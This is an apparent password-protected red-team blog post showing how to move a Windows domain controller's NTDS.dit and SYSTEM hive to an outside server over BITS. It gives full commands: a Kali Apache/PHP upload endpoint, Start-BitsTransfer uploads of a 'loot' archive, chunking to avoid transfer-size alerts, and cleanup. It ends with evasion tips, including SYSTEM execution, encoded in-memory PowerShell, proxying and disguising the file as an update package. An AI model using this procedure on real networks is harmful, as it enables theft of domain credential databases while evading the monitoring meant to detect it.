This post is password protection for obvious reasons, if you are reading this you have the password....
Covert Data Exfiltration Using BITS on Windows Domain Controllers
You have a NTDS.dit file and you have the SYSTEM registry but you need to get this file to an external server but the mission here is to not flag monitoring which means using an SMB session can be tracked and alerted on, so we need to think outside the box and use other Windows technology's that will not raise alarms (with the default configuration)
Disclaimer: This content is intended for authorized red team engagements, security research, or educational purposes only.
Objective: Demonstrate a stealthy method of data exfiltration using the trusted Windows Background Intelligent Transfer Service (BITS), while remaining under the radar of Microsoft Defender and most EDR solutions. Includes full setup on a Kali Linux server.
Why BITS?
BITS is a native Windows component used for background data transfer by services like Windows Update, Defender, and Intune. It operates with low priority and blends in with normal system activity.
Advantages:
- Trusted system component (low alert profile)
- Supports HTTP/S transfers
- Can be throttled or scheduled
- Survives reboots if configured asynchronously
Kali Web Server Setup
Lets first get Kali setup to receive the Bits transfer, which will involve installing Apache and PHP then creatign the upload directory and creating a PHP upload hander.
Install Apache and PHP
sudo apt update
sudo apt install apache2 php libapache2-mod-php -y
Create Upload Directory
sudo mkdir /var/www/html/uploads
sudo chmod 777 /var/www/html/uploads
Create PHP Upload Handler
Create a file /var/www/html/upload.php:
<?php
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Success.";
} else {
echo "Upload failed.";
}
?>
Exfiltration on Windows Domain Controller
Disclaimer: This content is intended for authorized red team engagements, security research, or educational purposes only.
This will use the BITS services to transfer the zipped "loot" file to our target server which should in turn not flag or alert in Defender protection.
Start the transfer stream with BITS
Start-BitsTransfer -Source "C:\Export\loot.zip"
-Destination "https://www1.bear.local/upload.php" -TransferType Upload
Advanced Process: Throttled and Asynchronous Upload
$job = Start-BitsTransfer -Source "C:\Export\loot.zip"
-Destination "https://www1.ber.local/upload.php" -TransferType Upload -Asynchronous
Set-BitsTransfer -BitsJob $job -Priority Low
Resume-BitsTransfer -BitsJob $job
Cleanup
Get-BitsTransfer | Remove-BitsTransfer
Chunking the File for Covert Upload (for large fie detection)
This will split file into small pieces to avoid triggering large transfer alerts and then transfer the chunked files, the first script will create the chunked files:
function Split-File($InputFile, $ChunkSizeMB = 1) {
$chunkSize = $ChunkSizeMB * 1MB
$buffer = New-Object byte[] $chunkSize
$stream = [System.IO.File]::OpenRead($InputFile)
$i = 0
while ($bytesRead = $stream.Read($buffer, 0, $chunkSize)) {
$outFile = "$InputFile.part$i"
[System.IO.File]::WriteAllBytes($outFile, $buffer[0..($bytesRead-1)])
$i++
}
$stream.Close()
}
Split-File -InputFile "C:\ProgramData\loot.zip" -ChunkSizeMB 1
Then you will need to upload each part, chunk by chunk:
Get-ChildItem "C:\ProgramData\loot.zip.part*" | ForEach-Object {
Start-BitsTransfer -Source $_.FullName
-Destination "https://your.domain.com/upload.php" -TransferType Upload
}
Security Considerations
- Run scripts under SYSTEM where possible (psexec -s) to avoid user-level logging.
- Use encoded PowerShell blocks or in-memory execution to evade command-line auditing.
- Consider using a proxy endpoint through proxy server for additional obfuscation.
- Avoid using obvious filenames like loot.zip; blend with system or update names like for example windows10.0-kb4100347-v3-x64_8251e1f6e3d760e110b35af950f9acee5f4f6777.msu